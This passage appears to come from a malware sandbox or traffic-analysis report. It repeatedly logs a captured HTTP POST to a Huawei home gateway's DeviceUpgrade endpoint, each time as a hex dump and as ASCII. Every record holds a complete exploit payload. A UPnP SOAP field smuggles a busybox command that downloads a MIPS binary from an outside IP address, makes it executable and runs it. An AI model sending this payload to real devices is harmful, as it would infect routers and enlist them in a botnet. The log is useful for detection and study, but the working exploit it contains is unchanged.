s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 23.94.186.250 -l /tmp/kh -r /..23091t/mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 33 2e 39 34 2e 31 38 36 2e 32 35 30 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 2e 2e 32 33 30 39 31 74 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 23.94.186.250 -l /tmp/kh -r /..23091t/mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 33 2e 39 34 2e 31 38 36 2e 32 35 30 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 2e 2e 32 33 30 39 31 74 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 23.94.186.250 -l /tmp/kh -r /..23091t/mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 33 2e 39 34 2e 31 38 36 2e 32 35 30 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 2e 2e 32 33 30 39 31 74 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 23.94.186.250 -l /tmp/kh -r /..23091t/mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 33 2e 39 34 2e 31 38 36 2e 32 35 30 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 2e 2e 32 33 30 39 31 74 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 23.94.186.250 -l /tmp/kh -r /..23091t/mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 33 2e 39 34 2e 31 38 36 2e 32 35 30 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 2e 2e 32 33 30 39 31 74 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 23.94.186.250 -l /tmp/kh -r /..23091t/mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 33 2e 39 34 2e 31 38 36 2e 32 35 30 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 2e 2e 32 33 30 39 31 74 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 23.94.186.250 -l /tmp/kh -r /..23091t/mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 33 2e 39 34 2e 31 38 36 2e 32 35 30 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 2e 2e 32 33 30 39 31 74 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 23.94.186.250 -l /tmp/kh -r /..23091t/mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 33 2e 39 34 2e 31 38 36 2e 32 35 30 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 2e 2e 32 33 30 39 31 74 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 23.94.186.250 -l /tmp/kh -r /..23091t/mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 33 2e 39 34 2e 31 38 36 2e 32 35 30 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 2e 2e 32 33 30 39 31 74 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 23.94.186.250 -l /tmp/kh -r /..23091t/mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 